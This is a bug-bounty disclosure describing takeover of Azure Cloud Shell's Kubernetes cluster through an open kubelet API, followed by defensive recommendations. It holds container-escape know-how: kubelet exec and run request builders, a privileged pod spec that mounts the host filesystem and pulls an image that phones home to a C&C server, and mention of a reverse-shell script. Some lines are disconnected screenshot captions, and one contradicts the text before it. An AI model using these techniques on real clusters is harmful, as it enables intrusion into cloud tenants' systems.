I Own Your Cloud Shell: Taking Over the “Azure Cloud Shell” Kubernetes Cluster Through an Unsecured Kubelet API ($30,000 Bounty)

User requests Cloud Shell through the Azure Portal:
  1. The client requests Cloud Shell via the Azure Portal.
  2. A random Kubernetes cluster is chosen.
  3. A free node in the cluster is assigned to the client.
  4. A container is created on the node with the client’s token, which allows the user to control all of their Azure resources.
After checking the current control group (cgroup), I found out that Cloud Shell is running on Kubernetes. That gave me a path to start digging for container/Kubernetes-related issues.
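A minimal sketch of such a check: Kubernetes-managed containers typically show “kubepods” in their cgroup paths (readable from /proc/1/cgroup). The sample line below is illustrative; the pod UID and container ID are made up.

```python
def looks_like_kubernetes(cgroup_text: str) -> bool:
    """Heuristic: cgroup paths of Kubernetes-managed containers
    contain "kubepods" (as read from /proc/1/cgroup)."""
    return "kubepods" in cgroup_text

# Illustrative line as it might appear in /proc/1/cgroup inside a pod
sample = "11:memory:/kubepods/besteffort/pod1f2d3c4b/0a1b2c3d4e5f"
print(looks_like_kubernetes(sample))  # True
```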
I tried to communicate with different known APIs used by Kubernetes and Docker. I started with the Docker Remote API, which (unless it listens on a UNIX socket) usually listens on port 2375, or on 2376 when HTTPS is used. Both ports were closed.
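Probing those ports comes down to a plain TCP connect. A sketch of such a probe; in the Cloud Shell case the target would be the node’s IP, while localhost is used here as a stand-in:

```python
import socket

def port_open(host: str, port: int, timeout: float = 2.0) -> bool:
    """Return True if a TCP connection to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

# 2375 is the plaintext Docker Remote API port, 2376 the TLS variant.
# Against the Cloud Shell node, both turned out to be closed.
for port in (2375, 2376):
    state = "open" if port_open("127.0.0.1", port) else "closed"
    print(f"port {port}: {state}")
```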
The read-only port was used in the past for health checks and is now disabled by default on newer Kubernetes releases. By calling this port, one can leak information about the pods and namespaces in use, their running container names, pod names, the host IP address, and more.
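For example, a GET to /pods on the read-only port (10255) returns a Kubernetes PodList. A sketch of pulling the leaked fields out of such a response; the JSON fragment below is an illustrative, made-up sample of that shape:

```python
import json

# Illustrative fragment of a kubelet /pods response; names are made up.
sample = json.loads("""
{
  "kind": "PodList",
  "items": [
    {
      "metadata": {"name": "console-abc12", "namespace": "cloud-shell"},
      "spec": {"containers": [{"name": "console-admin"}]},
      "status": {"hostIP": "172.17.0.1"}
    }
  ]
}
""")

# Extract namespace, pod name, container names, and host IP per pod
for pod in sample["items"]:
    containers = [c["name"] for c in pod["spec"]["containers"]]
    print(pod["metadata"]["namespace"], pod["metadata"]["name"],
          containers, pod["status"]["hostIP"])
```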
Voila! I was surprised to see that the port is accessible without any authentication.
The response means that the kubelet port is secured, so AKS customers can rest easy.

HACK 1: Rooting my own “Azure Cloud Shell” Container

The output of the command is a 302 status code, which means a redirect must be followed. Unfortunately, curl cannot handle this redirect: the next page, “/cri/exec/HnPxVYzr”, must be handled over WebSocket, and curl doesn’t have this feature yet. If the redirect is not followed, the command fails to run.
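For reference, the request that triggers the 302 goes to the kubelet’s exec endpoint on port 10250. A hypothetical helper that builds that URL, assuming the commonly documented shape of the kubelet exec endpoint; the namespace, pod, and container names are made up:

```python
from urllib.parse import urlencode

def kubelet_exec_url(node, namespace, pod, container, command):
    """Build the kubelet exec URL (port 10250). The kubelet answers a
    POST to it with a 302 whose Location points at /cri/exec/<token>,
    which must then be opened as a WebSocket -- plain curl cannot
    follow that part."""
    params = [("command", c) for c in command]
    params += [("input", "1"), ("output", "1"), ("tty", "1")]
    return (f"https://{node}:10250/exec/{namespace}/{pod}/{container}"
            f"?{urlencode(params)}")

print(kubelet_exec_url("172.17.0.1", "cloud-shell", "console-abc12",
                       "console-admin", ["id"]))
```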
The “hello_world” file, created through the kubelet API, is owned by the “root” user.
  1. Created a file named reverse.sh in the /tmp directory with the following payload:
The connection established to my C&C server with root privileges on the “Azure Cloud Shell” container (to which I should have had only low-privileged access).

HACK 2: Breaking out of the Container and Getting root on the Host (Node) of Azure’s Infrastructure

My guess was correct: the console-admin container is based on Alpine Linux (and the repositories were updated, too).
C&C server received the connection from the privileged “console-admin” container.
Mounting the host’s primary disk (/dev/sda1) into the /mnt3/ directory and displaying the hostname of the host (node) in Azure’s infrastructure.
Azure’s Cloud Shell Kubernetes cluster credentials
Using the credentials to list pods and nodes in the cluster
  • A “malicious” container image that connects to the C&C server on init.
  • The privileged flag, in order to have all the kernel capabilities in the pod.
  • The “nodeSelector” flag, which allows a user to choose the specific node his pod is scheduled on.
  • On the left, I use node #0’s kubelet credentials to deploy a pod with the malicious image, the privileged flag, and a specific node (#2) selected.
  • On the right, at 01:45 the pod was successfully deployed on that specific node; it connected to the C&C server, has all the kernel capabilities, and mounts node #2’s filesystem.
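Put together, the pod an attacker submits would look roughly like this, expressed here as a Python dict mirroring the YAML manifest; the image name and node hostname are hypothetical:

```python
import json

# Hypothetical pod spec: a privileged pod pinned to a specific node.
# The image name and node hostname below are made up for illustration.
pod = {
    "apiVersion": "v1",
    "kind": "Pod",
    "metadata": {"name": "evil-pod"},
    "spec": {
        # Schedule the pod onto the chosen node (nodeSelector flag)
        "nodeSelector": {"kubernetes.io/hostname": "node-2"},
        "containers": [{
            "name": "evil",
            "image": "attacker/reverse-shell:latest",  # phones home on init
            "securityContext": {"privileged": True},   # all kernel capabilities
            "volumeMounts": [{"name": "host", "mountPath": "/host"}],
        }],
        # Mount the node's root filesystem into the container
        "volumes": [{"name": "host", "hostPath": {"path": "/"}}],
    },
}
print(json.dumps(pod, indent=2))
```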

HACK 3: LPE on Any Container in “Azure Container Instance”

POC: Local privilege escalation through the kubelet API on Azure Container Instances. Here I used another method that does not require the WebSocket redirect, and the output is displayed right away. I ran “id” and “whoami” on the same container, and the output was root with id 0.
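A redirect-free method like this matches the kubelet’s /run endpoint, which executes a command synchronously and returns its output in the HTTP response. A hypothetical helper building that request URL (the namespace, pod, and container names are made up):

```python
from urllib.parse import urlencode

def kubelet_run_url(node, namespace, pod, container, cmd):
    """Build the kubelet /run URL (port 10250). A POST to it runs `cmd`
    in the container and returns the output directly in the HTTP
    response, with no WebSocket redirect involved."""
    return (f"https://{node}:10250/run/{namespace}/{pod}/{container}"
            f"?{urlencode({'cmd': cmd})}")

# e.g. POST this URL with: curl -k -X POST "<url>"
print(kubelet_run_url("172.17.0.1", "aci-ns", "my-pod", "my-container", "id"))
```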
  1. Block network connections between containers (pods) and hosts (nodes). That can be done through iptables.
  2. Use a different IP for the node instead of 172.17.0.1. By default, installing Docker on a host creates a new network interface with the IP 172.17.0.1, so someone with a little knowledge of Docker containers can very easily guess that this is the node’s IP.
  3. Disable the read-only port 10255 (which was used for health checks in the past and is not needed anymore).
  4. Secure port 10250 (the kubelet execution port) by running the kubelet API with the flag “--anonymous-auth=false” and a certificate.
  5. Block outbound connections on “suspicious” ports. I was able to create an outbound connection from the pods to my server (on a different cloud provider) on port 4444.
  6. Remove the privileged flag from the console-admin container; instead, you can build a “seccomp” profile (https://docs.docker.com/engine/security/seccomp/) and attach it to the container, in order to minimize the container’s access to kernel capabilities.

Chen Cohen, Penetration Tester @eBay